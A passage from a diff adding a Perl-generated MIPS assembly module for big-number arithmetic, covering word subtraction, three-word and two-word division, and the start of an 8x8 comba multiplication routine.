+	$SUBU	$t0,$ta0,$v0
+	sgtu	$v0,$t0,$ta0
+	$ST	$t0,0($a0)
+	$ADDU	$v0,$t8
+	beqz	$a3,.L_bn_sub_words_return
+
+	$LD	$t1,$BNSZ($a1)
+	subu	$a3,1
+	$LD	$ta1,$BNSZ($a2)
+	sltu	$t9,$t1,$ta1
+	$SUBU	$ta1,$t1,$ta1
+	$SUBU	$t1,$ta1,$v0
+	sgtu	$v0,$t1,$ta1
+	$ST	$t1,$BNSZ($a0)
+	$ADDU	$v0,$t9
+	beqz	$a3,.L_bn_sub_words_return
+
+	$LD	$t2,2*$BNSZ($a1)
+	$LD	$ta2,2*$BNSZ($a2)
+	sltu	$t8,$t2,$ta2
+	$SUBU	$ta2,$t2,$ta2
+	$SUBU	$t2,$ta2,$v0
+	sgtu	$v0,$t2,$ta2
+	$ST	$t2,2*$BNSZ($a0)
+	$ADDU	$v0,$t8
+
+.L_bn_sub_words_return:
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	move	$a0,$v0
+.end	bn_sub_words_internal
+
+.align 5
+.globl	bn_div_3_words
+.ent	bn_div_3_words
+bn_div_3_words:
+	.set	noreorder
+	move	$a3,$a0		# we know that bn_div_words does not
+				# touch $a3, $ta2, $ta3 and preserves $a2
+				# so that we can save two arguments
+				# and return address in registers
+				# instead of stack:-)
+				
+	$LD	$a0,($a3)
+	move	$ta2,$a1
+	bne	$a0,$a2,bn_div_3_words_internal
+	$LD	$a1,-$BNSZ($a3)
+	li	$v0,-1
+	jr	$ra
+	move	$a0,$v0
+.end	bn_div_3_words
+
+.align	5
+.ent	bn_div_3_words_internal
+bn_div_3_words_internal:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	.set	reorder
+	move	$ta3,$ra
+	bal	bn_div_words_internal
+	move	$ra,$ta3
+	$MULTU	$ta2,$v0
+	$LD	$t2,-2*$BNSZ($a3)
+	move	$ta0,$zero
+	mfhi	$t1
+	mflo	$t0
+	sltu	$t8,$t1,$a1
+.L_bn_div_3_words_inner_loop:
+	bnez	$t8,.L_bn_div_3_words_inner_loop_done
+	sgeu	$at,$t2,$t0
+	seq	$t9,$t1,$a1
+	and	$at,$t9
+	sltu	$t3,$t0,$ta2
+	$ADDU	$a1,$a2
+	$SUBU	$t1,$t3
+	$SUBU	$t0,$ta2
+	sltu	$t8,$t1,$a1
+	sltu	$ta0,$a1,$a2
+	or	$t8,$ta0
+	.set	noreorder
+	beqz	$at,.L_bn_div_3_words_inner_loop
+	$SUBU	$v0,1
+	$ADDU	$v0,1
+	.set	reorder
+.L_bn_div_3_words_inner_loop_done:
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	move	$a0,$v0
+.end	bn_div_3_words_internal
+
+.align	5
+.globl	bn_div_words
+.ent	bn_div_words
+bn_div_words:
+	.set	noreorder
+	bnez	$a2,bn_div_words_internal
+	li	$v0,-1		# I would rather signal div-by-zero
+				# which can be done with 'break 7'
+	jr	$ra
+	move	$a0,$v0
+.end	bn_div_words
+
+.align	5
+.ent	bn_div_words_internal
+bn_div_words_internal:
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x8000f008,-$SZREG
+	.set	noreorder
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$ra,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___;
+	move	$v1,$zero
+	bltz	$a2,.L_bn_div_words_body
+	move	$t9,$v1
+	$SLL	$a2,1
+	bgtz	$a2,.-4
+	addu	$t9,1
+
+	.set	reorder
+	negu	$t1,$t9
+	li	$t2,-1
+	$SLL	$t2,$t1
+	and	$t2,$a0
+	$SRL	$at,$a1,$t1
+	.set	noreorder
+	beqz	$t2,.+12
+	nop
+	break	6		# signal overflow
+	.set	reorder
+	$SLL	$a0,$t9
+	$SLL	$a1,$t9
+	or	$a0,$at
+___
+$QT=$ta0;
+$HH=$ta1;
+$DH=$v1;
+$code.=<<___;
+.L_bn_div_words_body:
+	$SRL	$DH,$a2,4*$BNSZ	# bits
+	sgeu	$at,$a0,$a2
+	.set	noreorder
+	beqz	$at,.+12
+	nop
+	$SUBU	$a0,$a2
+	.set	reorder
+
+	li	$QT,-1
+	$SRL	$HH,$a0,4*$BNSZ	# bits
+	$SRL	$QT,4*$BNSZ	# q=0xffffffff
+	beq	$DH,$HH,.L_bn_div_words_skip_div1
+	$DIVU	$zero,$a0,$DH
+	mflo	$QT
+.L_bn_div_words_skip_div1:
+	$MULTU	$a2,$QT
+	$SLL	$t3,$a0,4*$BNSZ	# bits
+	$SRL	$at,$a1,4*$BNSZ	# bits
+	or	$t3,$at
+	mflo	$t0
+	mfhi	$t1
+.L_bn_div_words_inner_loop1:
+	sltu	$t2,$t3,$t0
+	seq	$t8,$HH,$t1
+	sltu	$at,$HH,$t1
+	and	$t2,$t8
+	sltu	$v0,$t0,$a2
+	or	$at,$t2
+	.set	noreorder
+	beqz	$at,.L_bn_div_words_inner_loop1_done
+	$SUBU	$t1,$v0
+	$SUBU	$t0,$a2
+	b	.L_bn_div_words_inner_loop1
+	$SUBU	$QT,1
+	.set	reorder
+.L_bn_div_words_inner_loop1_done:
+
+	$SLL	$a1,4*$BNSZ	# bits
+	$SUBU	$a0,$t3,$t0
+	$SLL	$v0,$QT,4*$BNSZ	# bits
+
+	li	$QT,-1
+	$SRL	$HH,$a0,4*$BNSZ	# bits
+	$SRL	$QT,4*$BNSZ	# q=0xffffffff
+	beq	$DH,$HH,.L_bn_div_words_skip_div2
+	$DIVU	$zero,$a0,$DH
+	mflo	$QT
+.L_bn_div_words_skip_div2:
+	$MULTU	$a2,$QT
+	$SLL	$t3,$a0,4*$BNSZ	# bits
+	$SRL	$at,$a1,4*$BNSZ	# bits
+	or	$t3,$at
+	mflo	$t0
+	mfhi	$t1
+.L_bn_div_words_inner_loop2:
+	sltu	$t2,$t3,$t0
+	seq	$t8,$HH,$t1
+	sltu	$at,$HH,$t1
+	and	$t2,$t8
+	sltu	$v1,$t0,$a2
+	or	$at,$t2
+	.set	noreorder
+	beqz	$at,.L_bn_div_words_inner_loop2_done
+	$SUBU	$t1,$v1
+	$SUBU	$t0,$a2
+	b	.L_bn_div_words_inner_loop2
+	$SUBU	$QT,1
+	.set	reorder
+.L_bn_div_words_inner_loop2_done:
+
+	$SUBU	$a0,$t3,$t0
+	or	$v0,$QT
+	$SRL	$v1,$a0,$t9	# $v1 contains remainder if anybody wants it
+	$SRL	$a2,$t9		# restore $a2
+
+	.set	noreorder
+	move	$a1,$v1
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$t3,4*$SZREG($sp)
+	$REG_L	$t2,3*$SZREG($sp)
+	$REG_L	$t1,2*$SZREG($sp)
+	$REG_L	$t0,1*$SZREG($sp)
+	$REG_L	$gp,0*$SZREG($sp)
+	$PTR_ADD $sp,6*$SZREG
+___
+$code.=<<___;
+	jr	$ra
+	move	$a0,$v0
+.end	bn_div_words_internal
+___
+undef $HH; undef $QT; undef $DH;
+
+($a_0,$a_1,$a_2,$a_3)=($t0,$t1,$t2,$t3);
+($b_0,$b_1,$b_2,$b_3)=($ta0,$ta1,$ta2,$ta3);
+
+($a_4,$a_5,$a_6,$a_7)=($s0,$s2,$s4,$a1); # once we load a[7], no use for $a1
+($b_4,$b_5,$b_6,$b_7)=($s1,$s3,$s5,$a2); # once we load b[7], no use for $a2
+
+($t_1,$t_2,$c_1,$c_2,$c_3)=($t8,$t9,$v0,$v1,$a3);
+
+$code.=<<___;
+
+.align	5
+.globl	bn_mul_comba8
+.ent	bn_mul_comba8
+bn_mul_comba8:
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	.frame	$sp,12*$SZREG,$ra
+	.mask	0x803ff008,-$SZREG
+	$PTR_SUB $sp,12*$SZREG
+	$REG_S	$ra,11*$SZREG($sp)
+	$REG_S	$s5,10*$SZREG($sp)
+	$REG_S	$s4,9*$SZREG($sp)
+	$REG_S	$s3,8*$SZREG($sp)
+	$REG_S	$s2,7*$SZREG($sp)
+	$REG_S	$s1,6*$SZREG($sp)
+	$REG_S	$s0,5*$SZREG($sp)
+	$REG_S	$t3,4*$SZREG($sp)
+	$REG_S	$t2,3*$SZREG($sp)
+	$REG_S	$t1,2*$SZREG($sp)
+	$REG_S	$t0,1*$SZREG($sp)
+	$REG_S	$gp,0*$SZREG($sp)
+___
+$code.=<<___ if ($flavour !~ /nubi/i);
+	.frame	$sp,6*$SZREG,$ra
+	.mask	0x003f0000,-$SZREG
+	$PTR_SUB $sp,6*$SZREG
+	$REG_S	$s5,5*$SZREG($sp)
+	$REG_S	$s4,4*$SZREG($sp)
+	$REG_S	$s3,3*$SZREG($sp)
+	$REG_S	$s2,2*$SZREG($sp)
+	$REG_S	$s1,1*$SZREG($sp)
+	$REG_S	$s0,0*$SZREG($sp)
+___
+$code.=<<___;
+
+	.set	reorder
+	$LD	$a_0,0($a1)	# If compiled with -mips3 option on
+				# R5000 box assembler barks on this
+				# 1ine with "should not have mult/div
+				# as last instruction in bb (R10K
+				# bug)" warning. If anybody out there
+				# has a clue about how to circumvent
+				# this do send me a note.
+				#		<appro\@fy.chalmers.se>
+
+	$LD	$b_0,0($a2)
+	$LD	$a_1,$BNSZ($a1)
+	$LD	$a_2,2*$BNSZ($a1)
+	$MULTU	$a_0,$b_0		# mul_add_c(a[0],b[0],c1,c2,c3);
+	$LD	$a_3,3*$BNSZ($a1)
+	$LD	$b_1,$BNSZ($a2)
+	$LD	$b_2,2*$BNSZ($a2)
+	$LD	$b_3,3*$BNSZ($a2)
+	mflo	$c_1
+	mfhi	$c_2
+
+	$LD	$a_4,4*$BNSZ($a1)
+	$LD	$a_5,5*$BNSZ($a1)
+	$MULTU	$a_0,$b_1		# mul_add_c(a[0],b[1],c2,c3,c1);
+	$LD	$a_6,6*$BNSZ($a1)
+	$LD	$a_7,7*$BNSZ($a1)
+	$LD	$b_4,4*$BNSZ($a2)
+	$LD	$b_5,5*$BNSZ($a2)
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_1,$b_0		# mul_add_c(a[1],b[0],c2,c3,c1);
+	$ADDU	$c_3,$t_2,$at
+	$LD	$b_6,6*$BNSZ($a2)
+	$LD	$b_7,7*$BNSZ($a2)
+	$ST	$c_1,0($a0)	# r[0]=c1;
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	 $MULTU	$a_2,$b_0		# mul_add_c(a[2],b[0],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$c_1,$c_3,$t_2
+	$ST	$c_2,$BNSZ($a0)	# r[1]=c2;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_1,$b_1		# mul_add_c(a[1],b[1],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_0,$b_2		# mul_add_c(a[0],b[2],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$c_2,$c_1,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	 $MULTU	$a_0,$b_3		# mul_add_c(a[0],b[3],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	$ST	$c_3,2*$BNSZ($a0)	# r[2]=c3;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_1,$b_2		# mul_add_c(a[1],b[2],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$c_3,$c_2,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_2,$b_1		# mul_add_c(a[2],b[1],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_3,$b_0		# mul_add_c(a[3],b[0],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	 $MULTU	$a_4,$b_0		# mul_add_c(a[4],b[0],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	$ST	$c_1,3*$BNSZ($a0)	# r[3]=c1;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_3,$b_1		# mul_add_c(a[3],b[1],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$c_1,$c_3,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_2,$b_2		# mul_add_c(a[2],b[2],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_1,$b_3		# mul_add_c(a[1],b[3],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_0,$b_4		# mul_add_c(a[0],b[4],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	 $MULTU	$a_0,$b_5		# mul_add_c(a[0],b[5],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	$ST	$c_2,4*$BNSZ($a0)	# r[4]=c2;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_1,$b_4		# mul_add_c(a[1],b[4],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$c_2,$c_1,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_2,$b_3		# mul_add_c(a[2],b[3],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_3,$b_2		# mul_add_c(a[3],b[2],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_4,$b_1		# mul_add_c(a[4],b[1],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_5,$b_0		# mul_add_c(a[5],b[0],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	 $MULTU	$a_6,$b_0		# mul_add_c(a[6],b[0],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	$ST	$c_3,5*$BNSZ($a0)	# r[5]=c3;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_5,$b_1		# mul_add_c(a[5],b[1],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$c_3,$c_2,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_4,$b_2		# mul_add_c(a[4],b[2],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_3,$b_3		# mul_add_c(a[3],b[3],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_2,$b_4		# mul_add_c(a[2],b[4],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_1,$b_5		# mul_add_c(a[1],b[5],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_0,$b_6		# mul_add_c(a[0],b[6],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	 $MULTU	$a_0,$b_7		# mul_add_c(a[0],b[7],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	$ST	$c_1,6*$BNSZ($a0)	# r[6]=c1;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_1,$b_6		# mul_add_c(a[1],b[6],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$c_1,$c_3,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_2,$b_5		# mul_add_c(a[2],b[5],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_3,$b_4		# mul_add_c(a[3],b[4],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_4,$b_3		# mul_add_c(a[4],b[3],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_5,$b_2		# mul_add_c(a[5],b[2],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_6,$b_1		# mul_add_c(a[6],b[1],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_7,$b_0		# mul_add_c(a[7],b[0],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	 $MULTU	$a_7,$b_1		# mul_add_c(a[7],b[1],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	$ST	$c_2,7*$BNSZ($a0)	# r[7]=c2;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_6,$b_2		# mul_add_c(a[6],b[2],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$c_2,$c_1,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_5,$b_3		# mul_add_c(a[5],b[3],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_4,$b_4		# mul_add_c(a[4],b[4],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_3,$b_5		# mul_add_c(a[3],b[5],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_2,$b_6		# mul_add_c(a[2],b[6],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	$MULTU	$a_1,$b_7		# mul_add_c(a[1],b[7],c3,c1,c2);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_3,$t_1
+	sltu	$at,$c_3,$t_1
+	 $MULTU	$a_2,$b_7		# mul_add_c(a[2],b[7],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_1,$t_2
+	sltu	$at,$c_1,$t_2
+	$ADDU	$c_2,$at
+	$ST	$c_3,8*$BNSZ($a0)	# r[8]=c3;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_3,$b_6		# mul_add_c(a[3],b[6],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$c_3,$c_2,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_4,$b_5		# mul_add_c(a[4],b[5],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_5,$b_4		# mul_add_c(a[5],b[4],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_6,$b_3		# mul_add_c(a[6],b[3],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	$MULTU	$a_7,$b_2		# mul_add_c(a[7],b[2],c1,c2,c3);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_1,$t_1
+	sltu	$at,$c_1,$t_1
+	 $MULTU	$a_7,$b_3		# mul_add_c(a[7],b[3],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_2,$t_2
+	sltu	$at,$c_2,$t_2
+	$ADDU	$c_3,$at
+	$ST	$c_1,9*$BNSZ($a0)	# r[9]=c1;
+
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_6,$b_4		# mul_add_c(a[6],b[4],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$c_1,$c_3,$t_2
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_5,$b_5		# mul_add_c(a[5],b[5],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_4,$b_6		# mul_add_c(a[4],b[6],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
+	$MULTU	$a_3,$b_7		# mul_add_c(a[3],b[7],c2,c3,c1);
+	$ADDU	$t_2,$at
+	$ADDU	$c_3,$t_2
+	sltu	$at,$c_3,$t_2
+	$ADDU	$c_1,$at
+	mflo	$t_1
+	mfhi	$t_2
+	$ADDU	$c_2,$t_1
+	sltu	$at,$c_2,$t_1
